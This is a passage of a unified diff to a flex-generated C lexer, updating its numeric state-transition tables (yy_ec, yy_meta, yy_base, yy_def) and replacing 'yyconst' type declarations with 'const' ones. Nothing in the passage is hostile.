++ 164, 0, 0, 0, 0, 0, 0, 0, 116, 116, ++ 116, 116, 89, 90, 92, 116, 116, 116, 116, 116, ++ 116, 116, 33, 116, 116, 116, 116, 116, 116, 116, ++ 116, 116, 116, 116, 116, 116, 116, 57, 30, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 161, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 25, 0, 26, 139, ++ ++ 0, 0, 136, 0, 0, 0, 116, 116, 116, 116, ++ 116, 116, 96, 97, 116, 116, 82, 116, 116, 116, ++ 69, 68, 116, 116, 116, 72, 116, 116, 74, 116, ++ 116, 116, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 158, 13, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 23, 0, 0, 0, 0, ++ 155, 0, 0, 0, 0, 0, 116, 116, 116, 116, ++ 116, 116, 116, 116, 76, 116, 116, 116, 71, 67, ++ 83, 116, 116, 116, 116, 81, 162, 2, 0, 0, ++ ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 20, 140, 138, 0, 0, 153, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 116, 116, ++ 116, 116, 116, 116, 116, 116, 73, 116, 66, 116, ++ 116, 79, 80, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 160, 0, ++ 0, 0, 145, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 116, ++ 116, 116, 116, 116, 116, 116, 116, 116, 77, 78, ++ ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 152, 0, 0, 0, 0, 0, 0, 0, 157, ++ 0, 0, 0, 0, 116, 116, 116, 116, 116, 116, ++ 116, 116, 70, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 15, 0, 0, 0, 0, 0, 141, 154, ++ 0, 0, 0, 0, 0, 116, 116, 116, 116, 116, ++ 94, 116, 116, 0, 0, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ ++ 0, 144, 0, 0, 0, 0, 0, 131, 0, 0, ++ 0, 0, 116, 103, 116, 116, 116, 116, 101, 146, ++ 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, ++ 0, 8, 9, 0, 0, 0, 0, 0, 0, 22, ++ 0, 0, 0, 142, 0, 0, 116, 116, 116, 100, ++ 116, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 0, 10, 0, 0, 135, 0, 130, 0, 0, 0, ++ 0, 0, 116, 116, 88, 116, 0, 0, 150, 0, ++ 0, 0, 0, 0, 126, 0, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 116, 116, 99, 0, 0, ++ ++ 0, 0, 5, 0, 0, 0, 0, 128, 0, 133, ++ 0, 0, 0, 143, 0, 116, 116, 151, 148, 0, ++ 147, 125, 0, 0, 0, 0, 0, 0, 137, 165, ++ 116, 116, 149, 0, 0, 0, 156, 0, 0, 116, ++ 116, 127, 0, 0, 0, 132, 102, 116, 6, 0, ++ 134, 116, 0, 116, 0, 116, 7, 116, 104, 0 + } ; + +-static yyconst flex_int32_t yy_ec[256] = ++static const YY_CHAR yy_ec[256] = + { 0, + 1, 1, 1, 1, 1, 1, 1, 1, 2, 3, + 1, 1, 4, 1, 1, 1, 1, 1, 1, 1, +@@ -542,7 +535,7 @@ static yyconst flex_int32_t yy_ec[256] = + 1, 1, 1, 1, 1 + } ; + +-static yyconst flex_int32_t yy_meta[71] = ++static const YY_CHAR yy_meta[71] = + { 0, + 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, + 1, 3, 3, 3, 4, 4, 1, 4, 4, 4, +@@ -553,614 +546,629 @@ static yyconst flex_int32_t yy_meta[71] + 3, 3, 3, 3, 3, 3, 3, 3, 3, 1 + } ; + +-static yyconst flex_int16_t yy_base[1243] = ++static const flex_int16_t yy_base[1269] = + { 0, +- 0, 69, 2841, 70, 71, 74, 76, 76, 2835, 81, +- 2842, 2845, 2845, 2845, 74, 83, 78, 88, 78, 129, +- 2774, 2823, 83, 95, 98, 103, 107, 135, 141, 147, +- 156, 150, 159, 163, 169, 185, 203, 208, 212, 218, +- 223, 2769, 144, 260, 2845, 2845, 172, 2816, 2845, 2845, +- 2823, 2845, 227, 230, 238, 288, 292, 299, 296, 303, +- 306, 311, 241, 314, 317, 323, 350, 326, 369, 184, +- 2814, 2845, 201, 2813, 121, 2845, 2831, 216, 2845, 90, +- 2766, 175, 250, 375, 192, 2845, 0, 379, 394, 2845, +- 2845, 0, 2845, 336, 402, 408, 420, 423, 426, 429, +- +- 433, 436, 442, 445, 448, 451, 454, 457, 464, 467, +- 471, 474, 480, 483, 489, 498, 502, 505, 517, 522, +- 525, 531, 537, 540, 547, 2845, 232, 0, 321, 2806, +- 154, 64, 134, 253, 225, 2777, 489, 2776, 518, 2769, +- 511, 2782, 2777, 179, 2768, 2771, 366, 2802, 2765, 2845, +- 561, 567, 570, 576, 583, 589, 592, 595, 598, 601, +- 606, 610, 615, 623, 626, 629, 632, 639, 635, 644, +- 648, 390, 2800, 2754, 406, 2798, 207, 648, 366, 665, +- 511, 0, 688, 141, 670, 0, 661, 693, 675, 700, +- 703, 711, 714, 718, 721, 728, 731, 734, 737, 740, +- +- 745, 748, 754, 757, 773, 776, 782, 787, 790, 793, +- 796, 799, 804, 807, 811, 815, 821, 825, 834, 838, +- 2793, 2770, 2754, 297, 2757, 717, 2764, 2766, 2764, 794, +- 2766, 2753, 191, 2747, 2760, 2845, 2748, 345, 2759, 311, +- 2743, 2756, 2741, 2755, 34, 2740, 439, 2747, 2737, 2742, +- 2738, 2743, 2735, 2746, 855, 858, 864, 867, 873, 877, +- 880, 883, 886, 889, 892, 898, 901, 908, 912, 915, +- 918, 931, 934, 923, 2745, 941, 946, 951, 958, 962, +- 974, 977, 986, 989, 992, 1000, 1003, 1006, 1009, 1012, +- 1015, 1018, 1021, 1024, 1027, 1030, 1033, 1036, 1040, 1049, +- +- 1052, 1062, 1079, 1083, 1088, 1091, 1094, 1097, 1105, 1108, +- 1111, 2845, 2743, 2733, 2741, 2740, 2740, 2728, 362, 2719, +- 2740, 2723, 2845, 2734, 2724, 2721, 2718, 2734, 2723, 2717, +- 2757, 2726, 2716, 2718, 2710, 2709, 2721, 2720, 2709, 2715, +- 2703, 2712, 2710, 2701, 2711, 2699, 1051, 2701, 2698, 2739, +- 2708, 2707, 2693, 2692, 2845, 1116, 1119, 1122, 1128, 1132, +- 1138, 1143, 1146, 1149, 1162, 1166, 1173, 1176, 1180, 1185, +- 1191, 1199, 1202, 2845, 1205, 1209, 1219, 1215, 1230, 1225, +- 1239, 1246, 1257, 1260, 1264, 1267, 1270, 1273, 1276, 1279, +- 1282, 1285, 1289, 1292, 1295, 1301, 1304, 1307, 1310, 1313, +- +- 1316, 1326, 1334, 1340, 1343, 1347, 2692, 2720, 2689, 2695, +- 2686, 2690, 2689, 2697, 2692, 2681, 2681, 2683, 2681, 2695, +- 2676, 2683, 2688, 2691, 2677, 2704, 2673, 2669, 2678, 2685, +- 2672, 2678, 2678, 2668, 2670, 2666, 2668, 2672, 2668, 2695, +- 2662, 2669, 2650, 2667, 2666, 2656, 2658, 546, 536, 2649, +- 1351, 1356, 1359, 1366, 1369, 1373, 1381, 1387, 1392, 1395, +- 1398, 1401, 1404, 1411, 1416, 1423, 1426, 1429, 1433, 1442, +- 1439, 1471, 1474, 1477, 1480, 1483, 1487, 1498, 1501, 1504, +- 1507, 1510, 1513, 1516, 1519, 1522, 1525, 1533, 1536, 1539, +- 1543, 1549, 2650, 2643, 1545, 2660, 2653, 2646, 2651, 2645, +- +- 2647, 2648, 2642, 2639, 2638, 2652, 2638, 2644, 2651, 2631, +- 2646, 2648, 2630, 2643, 2645, 2632, 2627, 2634, 2638, 2637, +- 2635, 2626, 2633, 2623, 2623, 2622, 2625, 2615, 2614, 2615, +- 2655, 2625, 2619, 2613, 363, 2612, 2611, 2623, 1554, 1559, +- 1564, 1570, 1579, 1588, 1591, 1597, 1601, 1604, 1607, 1612, +- 1617, 1620, 1623, 1635, 1643, 1646, 1649, 1657, 1663, 1668, +- 1678, 1681, 1684, 1687, 1690, 1696, 1700, 1703, 1712, 1715, +- 1718, 1722, 1725, 1728, 1732, 1735, 1738, 1741, 2648, 2636, +- 2602, 2612, 2614, 2613, 2601, 2615, 2610, 2605, 2604, 2594, +- 2604, 2592, 2600, 2599, 2602, 2588, 2600, 2587, 2587, 2597, +- +- 2596, 2588, 2845, 2594, 2587, 2594, 2591, 2584, 2602, 2618, +- 567, 2591, 2616, 2574, 2845, 2580, 2570, 2579, 2578, 2567, +- 2570, 2578, 2569, 2577, 2579, 2566, 2574, 2560, 2565, 1744, +- 1749, 1755, 1767, 1761, 1773, 1776, 1779, 1782, 1785, 1789, +- 1801, 1804, 1808, 1812, 1815, 1833, 1836, 1845, 1851, 1854, +- 1857, 1860, 1863, 1870, 1874, 1882, 1886, 1889, 1892, 1897, +- 1900, 1903, 1906, 2561, 2573, 2565, 2547, 2546, 2539, 2536, +- 2527, 2845, 2525, 2538, 593, 2845, 1313, 2528, 2526, 2535, +- 2845, 2845, 2537, 2562, 2520, 2845, 2530, 2845, 2525, 2528, +- 2845, 2527, 2506, 2514, 2513, 2521, 2514, 2510, 2511, 2503, +- +- 2511, 2505, 2504, 2493, 2511, 2845, 2509, 2508, 2508, 2493, +- 2505, 2491, 680, 1909, 1912, 1916, 1919, 1922, 1925, 1931, +- 1934, 1938, 1944, 1954, 1957, 1960, 1963, 1966, 1969, 1973, +- 1978, 1987, 1993, 2004, 2009, 2012, 2015, 2022, 2025, 2028, +- 2035, 2040, 2504, 2494, 2492, 2480, 2487, 2515, 2465, 2466, +- 2465, 2458, 2438, 2439, 2388, 2388, 2393, 2377, 2387, 2379, +- 837, 2373, 2373, 2368, 2367, 2362, 2399, 2845, 2334, 2340, +- 2338, 2340, 2336, 2311, 2297, 2291, 2297, 2293, 2268, 2845, +- 2268, 2845, 2845, 2259, 2286, 2845, 2277, 2255, 2239, 2043, +- 2049, 2052, 2055, 2058, 2062, 2065, 2068, 2071, 2077, 2080, +- +- 2083, 2086, 2095, 2099, 2110, 2113, 2116, 2124, 2127, 2130, +- 2137, 2140, 2143, 2245, 2243, 2242, 2241, 2233, 2188, 2196, +- 2225, 2213, 2163, 2166, 231, 2175, 2174, 2157, 2145, 2845, +- 2845, 2145, 2152, 2123, 2136, 2127, 2118, 2107, 2119, 2087, +- 2095, 2084, 2083, 2082, 2062, 2067, 2845, 2069, 2049, 2083, +- 2067, 2845, 2025, 2000, 2000, 673, 1989, 2146, 2150, 2158, +- 2161, 2165, 2169, 2172, 2175, 2180, 2184, 2187, 2195, 2198, +- 2204, 2216, 2219, 2222, 2225, 2228, 2845, 2845, 1983, 1979, +- 1966, 1955, 1995, 1948, 1949, 1953, 1945, 1933, 1928, 1932, +- 1934, 1918, 1913, 1913, 1914, 1894, 1894, 1891, 1920, 1861, +- +- 1828, 1840, 2845, 2845, 2845, 1829, 1813, 2845, 1804, 1800, +- 1793, 1792, 1820, 1790, 1789, 1780, 1786, 1774, 2237, 2242, +- 2245, 2250, 2253, 2256, 2259, 2262, 2265, 2268, 2271, 2274, +- 2277, 2285, 1811, 1779, 1768, 1752, 1744, 1756, 1756, 1755, +- 1746, 1735, 1717, 1708, 1721, 1702, 1703, 2845, 1710, 1672, +- 1662, 2845, 1659, 1657, 1634, 1636, 1624, 1617, 1618, 1604, +- 1616, 1605, 1592, 1600, 1589, 1624, 1589, 1578, 2299, 2303, +- 2308, 2311, 2315, 2318, 2321, 2324, 2327, 2335, 1579, 1571, +- 1556, 1543, 1547, 1546, 1531, 1564, 1522, 1568, 1536, 1518, +- 1520, 1501, 1496, 1508, 1518, 1522, 1491, 1458, 1448, 2845, +- +- 1485, 1440, 1440, 1435, 1430, 1427, 1427, 2845, 1409, 1410, +- 1418, 1441, 2338, 2341, 2344, 2352, 2357, 2362, 2365, 2368, +- 1411, 1409, 1383, 1411, 1375, 1370, 1363, 1344, 1337, 1340, +- 1371, 1336, 1330, 1317, 1307, 1313, 1312, 1285, 1291, 2845, +- 1274, 1272, 1262, 1254, 1204, 2845, 2845, 1214, 1214, 1212, +- 1193, 1203, 2371, 2379, 2384, 2387, 2391, 2398, 2394, 1198, +- 1174, 1159, 1150, 1158, 1145, 1151, 1151, 1145, 1145, 1123, +- 1123, 1125, 1121, 1110, 1148, 1109, 1116, 2845, 1144, 1104, +- 1098, 1084, 1084, 2845, 1087, 1076, 1095, 78, 2401, 2404, +- 2409, 2414, 2421, 2438, 2845, 175, 207, 199, 199, 268, +- +- 2845, 250, 302, 271, 294, 307, 2845, 2845, 310, 392, +- 389, 423, 415, 440, 2845, 445, 448, 488, 2845, 467, +- 483, 2441, 2444, 2447, 2450, 496, 517, 541, 579, 562, +- 569, 574, 606, 619, 756, 2845, 633, 671, 2845, 648, +- 2845, 649, 660, 678, 706, 707, 2453, 2456, 2459, 2462, +- 723, 732, 2845, 723, 742, 764, 777, 810, 2845, 772, +- 787, 794, 790, 803, 797, 840, 824, 832, 857, 2467, +- 2470, 2473, 866, 868, 884, 890, 2845, 891, 891, 893, +- 907, 2845, 917, 2845, 957, 919, 930, 2845, 922, 2480, +- 2476, 2845, 2845, 934, 2845, 2845, 944, 938, 938, 961, +- +- 998, 1009, 2845, 2845, 2483, 2489, 2845, 1017, 1023, 1025, +- 2845, 1023, 1029, 2494, 2498, 2845, 1019, 1022, 1038, 2845, +- 2506, 2509, 2845, 1025, 2845, 2513, 1037, 2519, 1062, 2526, +- 2845, 2533, 2536, 2845, 2594, 2598, 2602, 2606, 2608, 2610, +- 2614, 1109 ++ 0, 69, 2946, 70, 71, 74, 76, 76, 2940, 81, ++ 2947, 2950, 2950, 2950, 74, 83, 78, 88, 78, 129, ++ 2879, 2928, 83, 95, 98, 102, 136, 141, 151, 147, ++ 156, 159, 162, 169, 175, 178, 185, 189, 204, 212, ++ 217, 220, 2874, 115, 259, 2950, 2950, 117, 2921, 2950, ++ 2950, 2928, 2950, 223, 246, 249, 287, 261, 296, 301, ++ 290, 304, 310, 313, 316, 322, 348, 353, 358, 366, ++ 375, 206, 2919, 2950, 238, 2918, 151, 2950, 2936, 244, ++ 2950, 90, 2871, 172, 361, 421, 197, 2950, 0, 398, ++ 380, 2950, 2950, 0, 2950, 387, 418, 428, 438, 442, ++ ++ 445, 448, 451, 454, 464, 467, 470, 473, 476, 479, ++ 486, 489, 493, 496, 501, 504, 507, 510, 513, 523, ++ 528, 531, 540, 545, 551, 561, 564, 568, 2950, 284, ++ 0, 273, 2911, 189, 70, 183, 291, 299, 2882, 388, ++ 2881, 335, 2874, 532, 2887, 2882, 89, 2873, 2876, 351, ++ 2907, 2870, 2950, 582, 585, 588, 594, 597, 602, 611, ++ 614, 617, 620, 623, 627, 633, 639, 642, 645, 648, ++ 652, 655, 663, 667, 677, 391, 2905, 2859, 416, 2903, ++ 197, 677, 370, 694, 390, 0, 703, 162, 699, 0, ++ 717, 720, 723, 727, 730, 743, 746, 749, 752, 755, ++ ++ 761, 764, 767, 775, 771, 778, 781, 784, 788, 793, ++ 802, 806, 810, 815, 820, 823, 826, 829, 834, 837, ++ 847, 850, 857, 860, 864, 2898, 2875, 2859, 232, 2862, ++ 510, 2869, 2871, 2869, 284, 2871, 2858, 202, 2852, 2865, ++ 2950, 2853, 834, 2864, 303, 2848, 2861, 2846, 2860, 34, ++ 2845, 489, 2852, 2842, 2847, 2843, 2848, 2840, 2851, 867, ++ 886, 889, 893, 899, 902, 905, 909, 912, 918, 926, ++ 929, 934, 938, 942, 948, 953, 957, 960, 967, 973, ++ 2850, 976, 981, 1001, 1004, 1007, 1010, 1015, 1024, 1027, ++ 1031, 1040, 1043, 1046, 1050, 1055, 1058, 1061, 1064, 1067, ++ ++ 1070, 1073, 1076, 1082, 1088, 1094, 1097, 1108, 1118, 1121, ++ 1125, 1133, 1136, 1140, 1143, 1146, 1149, 1152, 2950, 2848, ++ 2838, 2846, 2845, 2845, 2833, 525, 2824, 2845, 2828, 2950, ++ 2839, 2829, 2826, 2823, 2839, 2828, 2822, 2862, 2831, 2821, ++ 2823, 2815, 2814, 2826, 2825, 2814, 2820, 2808, 2817, 2815, ++ 2806, 2816, 2804, 668, 2806, 2803, 2844, 2813, 2812, 2798, ++ 2797, 2950, 1161, 1164, 1170, 1173, 1178, 1184, 1188, 1191, ++ 1194, 1202, 1207, 1210, 1213, 1220, 1223, 1226, 1231, 1236, ++ 1244, 2950, 1247, 1264, 1277, 1290, 1293, 1296, 1299, 1303, ++ 1306, 1310, 1313, 1324, 1329, 1332, 1335, 1338, 1341, 1344, ++ ++ 1347, 1352, 1355, 1361, 1364, 1367, 1370, 1373, 1376, 1379, ++ 1389, 1396, 1402, 1406, 1410, 2797, 2825, 2794, 2800, 2791, ++ 2795, 2794, 2802, 2797, 2786, 2786, 2788, 2786, 2800, 2781, ++ 2788, 2793, 2796, 2782, 2809, 2778, 2774, 2783, 2790, 2777, ++ 2783, 2783, 2773, 2775, 2771, 2773, 2777, 2773, 2800, 2767, ++ 2774, 2755, 2772, 2771, 2761, 2763, 385, 233, 2754, 1414, ++ 1419, 1422, 1429, 1435, 1444, 1449, 1454, 1457, 1460, 1463, ++ 1468, 1474, 1477, 1480, 1488, 1494, 1497, 1507, 1500, 1510, ++ 1514, 1535, 1543, 1546, 1549, 1559, 1555, 1564, 1570, 1574, ++ 1577, 1580, 1583, 1586, 1589, 1592, 1595, 1598, 1601, 1607, ++ ++ 1610, 1616, 1622, 2755, 2748, 1606, 2765, 2758, 2751, 2756, ++ 2750, 2752, 2753, 2747, 2744, 2743, 2757, 2743, 2749, 2756, ++ 2736, 2751, 2753, 2735, 2748, 2750, 2737, 2732, 2739, 2743, ++ 2742, 2740, 2731, 2738, 2728, 2728, 2727, 2730, 2720, 2719, ++ 2720, 2760, 2730, 2724, 2718, 373, 2717, 2716, 2728, 1625, ++ 1637, 1640, 1643, 1649, 1653, 1656, 1661, 1664, 1668, 1674, ++ 1677, 1680, 1683, 1696, 1702, 1705, 1708, 1712, 1715, 1723, ++ 1730, 1733, 1748, 1737, 1751, 1756, 1759, 1763, 1767, 1772, ++ 1778, 1783, 1786, 1789, 1793, 1796, 1799, 1804, 1807, 1810, ++ 1813, 2753, 2741, 2707, 2717, 2719, 2718, 2706, 2720, 2715, ++ ++ 2710, 2709, 2699, 2709, 2697, 2705, 2704, 2707, 2693, 2705, ++ 2692, 2692, 2702, 2701, 2693, 2950, 2699, 2692, 2699, 2696, ++ 2689, 2707, 2723, 536, 2696, 2721, 2679, 2950, 2685, 2675, ++ 2682, 2659, 2648, 2651, 2659, 2650, 2658, 2660, 2647, 2655, ++ 2641, 2646, 1816, 1820, 1823, 1826, 1832, 1838, 1841, 1845, ++ 1848, 1851, 1860, 1863, 1871, 1877, 1886, 1880, 1889, 1896, ++ 1893, 1901, 1916, 1920, 1923, 1926, 1929, 1932, 1943, 1951, ++ 1954, 1959, 1962, 1965, 1970, 1973, 1976, 1979, 2641, 2652, ++ 2646, 2650, 2649, 2642, 2639, 2630, 2950, 2627, 2640, 566, ++ 2950, 1158, 2630, 2628, 2637, 2950, 2950, 2638, 2663, 2621, ++ ++ 2950, 2630, 2950, 2625, 2628, 2950, 2627, 2608, 2616, 2612, ++ 2620, 2598, 2594, 2594, 2559, 2567, 2557, 2555, 2532, 2550, ++ 2950, 2547, 2546, 2545, 2529, 2541, 2507, 395, 1982, 1988, ++ 1991, 1994, 1997, 2000, 2004, 2007, 2011, 2014, 2021, 2029, ++ 2032, 2035, 2041, 2044, 2054, 2058, 2066, 2070, 2077, 2080, ++ 2092, 2096, 2099, 2102, 2110, 2113, 2116, 2061, 2123, 2520, ++ 2476, 2477, 2463, 2470, 2491, 2437, 2449, 2447, 2446, 2429, ++ 2430, 2416, 2416, 2422, 2404, 2415, 2390, 957, 2384, 2386, ++ 2357, 2349, 2347, 2387, 2950, 2334, 2344, 2342, 2338, 2335, ++ 2304, 2282, 2277, 2283, 2268, 2250, 2950, 2246, 2950, 2950, ++ ++ 2244, 2273, 2950, 2253, 2222, 2206, 2128, 2131, 2136, 2139, ++ 2142, 2145, 2150, 2153, 2156, 2162, 2165, 2170, 2173, 2184, ++ 2196, 2201, 2204, 2207, 2213, 2218, 2224, 2227, 2230, 2237, ++ 2240, 2243, 2215, 2196, 2195, 2215, 2214, 2169, 2173, 2203, ++ 2181, 2141, 2144, 433, 2153, 2151, 2131, 2133, 2950, 2950, ++ 2130, 2138, 2113, 2126, 2123, 2121, 2100, 2100, 2079, 2082, ++ 2081, 2070, 2068, 2044, 2051, 2950, 2051, 2040, 2068, 2065, ++ 2950, 2008, 2006, 2005, 275, 2001, 2246, 2250, 2258, 2261, ++ 2264, 2269, 2272, 2275, 2278, 2285, 2288, 2291, 2298, 2302, ++ 2309, 2313, 2320, 2323, 2326, 2329, 2950, 2950, 1999, 1995, ++ ++ 1987, 1986, 2020, 1973, 1977, 1981, 1972, 1934, 1929, 1918, ++ 1902, 1914, 1908, 1905, 1905, 1890, 1889, 1876, 1904, 1877, ++ 1857, 1862, 2950, 2950, 2950, 1846, 1839, 2950, 1830, 1827, ++ 1820, 1811, 1849, 1818, 1818, 1792, 1794, 1755, 2335, 2338, ++ 2343, 2346, 2351, 2354, 2357, 2360, 2363, 2366, 2369, 2373, ++ 2376, 2384, 2388, 1768, 1736, 1731, 1716, 1694, 1706, 1706, ++ 1690, 1694, 1683, 1652, 1648, 1655, 1639, 1639, 2950, 1650, ++ 1634, 1625, 2950, 1612, 1611, 1593, 1595, 1583, 1584, 1578, ++ 1569, 1568, 1531, 1520, 1524, 1509, 1544, 1492, 1483, 2401, ++ 2404, 2409, 2412, 2415, 2418, 2421, 2424, 2427, 2430, 2438, ++ ++ 1480, 1487, 1481, 1468, 1478, 1453, 1439, 1469, 1429, 1476, ++ 1433, 1418, 1424, 1396, 1396, 1404, 1428, 1431, 1401, 1395, ++ 1385, 2950, 1420, 1374, 1375, 1383, 1362, 1361, 1357, 2950, ++ 1341, 1340, 1347, 1371, 2441, 2444, 2447, 2451, 2465, 2468, ++ 2471, 2474, 2482, 1345, 1321, 1320, 1342, 1283, 1283, 1275, ++ 1271, 1240, 1243, 1277, 1242, 1236, 1233, 1219, 1225, 1230, ++ 1224, 1231, 2950, 1221, 1215, 1223, 1224, 1205, 2950, 2950, ++ 1217, 1216, 1214, 1201, 1208, 2490, 2493, 2496, 2500, 2504, ++ 2509, 2513, 2518, 1203, 1190, 1185, 1182, 1179, 1167, 1167, ++ 1163, 1159, 1147, 1112, 1110, 1115, 1093, 1081, 1108, 1069, ++ ++ 1076, 2950, 1103, 1069, 1067, 1052, 1059, 2950, 1062, 1048, ++ 1077, 68, 2523, 2526, 2529, 2532, 2535, 2541, 2548, 2950, ++ 126, 174, 178, 226, 273, 2950, 248, 348, 376, 404, ++ 443, 2950, 2950, 446, 452, 469, 483, 512, 533, 2950, ++ 558, 558, 599, 2950, 561, 593, 2551, 2554, 2561, 2564, ++ 2567, 584, 611, 622, 653, 623, 630, 636, 635, 653, ++ 684, 2950, 664, 696, 2950, 675, 2950, 686, 689, 689, ++ 702, 714, 2570, 2573, 2576, 2590, 722, 754, 2950, 750, ++ 761, 775, 795, 832, 2950, 795, 801, 807, 807, 825, ++ 826, 865, 842, 842, 844, 2593, 2596, 2599, 845, 858, ++ ++ 878, 878, 2950, 883, 876, 876, 892, 2950, 904, 2950, ++ 937, 899, 913, 2950, 916, 2606, 2612, 2950, 2950, 939, ++ 2950, 2950, 949, 942, 944, 953, 946, 957, 2950, 2950, ++ 2615, 2619, 2950, 958, 963, 979, 2950, 977, 980, 2623, ++ 2626, 2950, 971, 983, 997, 2950, 2629, 2633, 2950, 997, ++ 2950, 2636, 1004, 2645, 1041, 2649, 2950, 2652, 2655, 2950, ++ 2713, 2717, 2721, 2725, 2727, 2729, 2733, 1088 + } ; + +-static yyconst flex_int16_t yy_def[1243] = ++static const flex_int16_t yy_def[1269] = + { 0, +- 1234, 1, 1235, 1235, 1236, 1236, 1, 7, 1, 1, +- 1234, 1234, 1234, 1234, 1237, 1238, 1234, 1239, 1234, 1234, +- 20, 1234, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1234, +- 44, 1234, 1234, 44, 1237, 1234, 1237, 1238, 1234, 1234, +- 20, 1239, 1239, 1239, 1239, 1234, 1241, 1234, 1234, 1234, +- 1234, 1242, 1234, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1234, 1234, 44, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1234, 44, 1234, 1234, 44, 1234, 1234, 1239, 1239, +- 1239, 1241, 1234, 1234, 1234, 1242, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1234, 1239, 1239, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1234, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- +- 1240, 1240, 1240, 1240, 1240, 1240, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, +- 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1240, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234, 